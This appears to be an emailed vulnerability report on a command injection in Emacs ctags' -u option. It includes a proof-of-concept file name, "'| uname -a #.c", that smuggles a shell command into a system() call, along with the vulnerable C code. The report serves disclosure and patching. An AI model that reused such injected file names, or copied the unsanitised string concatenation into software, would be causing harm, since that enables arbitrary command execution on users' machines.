Hi, In ctags (Emacs <= 28.2.50) has a command execute vulnerability.

When using the -u parameter, ctags will execute external shell commands by calling the system() function, if there are special file names, unexpected shell commands may be executed. The example is as follows:

$ ls
etags.c
$ /usr/local/bin/ctags *.c
$ touch "'| uname -a #.c"
$ /usr/local/bin/ctags -u *.c
Linux mypc 6.0.8-300.fc37.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 11 15:09:04 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

^C/usr/local/bin/ctags: failed to execute shell command

The vulnerability occurs in the following code:

char *z = stpcpy (cmd, "mv ");                   
z = stpcpy (z, tagfile);                         
z = stpcpy (z, " OTAGS;grep -Fv '\t");           
z = stpcpy (z, argbuffer[i].what);               
z = stpcpy (z, "\t' OTAGS >");                   
z = stpcpy (z, tagfile);                         
strcpy (z, ";rm OTAGS");                         
if (system (cmd) != EXIT_SUCCESS)               
  fatal ("failed to execute shell command");     

Because the file name is not checked, the file name is used as a concatenated string:

mv tags OTAGS;grep -Fv ' '| uname -a #.c ' OTAGS >tags;rm OTAGS

Email attachments are patches.